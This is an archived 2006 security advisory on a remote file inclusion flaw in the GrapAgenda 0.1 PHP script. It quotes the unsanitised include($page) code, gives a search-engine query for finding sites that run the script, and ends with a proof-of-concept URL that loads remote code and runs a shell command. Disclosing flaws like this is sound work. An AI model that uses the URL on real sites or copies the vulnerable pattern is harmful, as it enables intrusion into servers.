[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability

2006-09-05T00:00:00
ID SECURITYVULNS:DOC:14152
Type securityvulns
Reporter Securityvulns
Modified 2006-09-05T00:00:00

Description

  • Kurdish Security Advisory
  • Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html
  • Script : GrapAgenda
  • Site : http://www.graphiks.net
  • Version : 0.1
  • Risk : High
  • Class : Remote
  • Contact : botan@linuxmail.org and irc.gigachat.net #kurdhack
  • Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and team : ColdHackers, Patriotic Hackers, Kurdish Hackers Clan [back ? auyehuah maybe] other teamz

Google w0rkez :P : "GrapAgenda"

lol now code :]

if($page!=""){ include($page); }else{ include("accueil.php"); } ?>

huh :] nice code,

PoC

http://www.site.com/[agendapath]/index.php?page=yourcode.txt?&cmd=id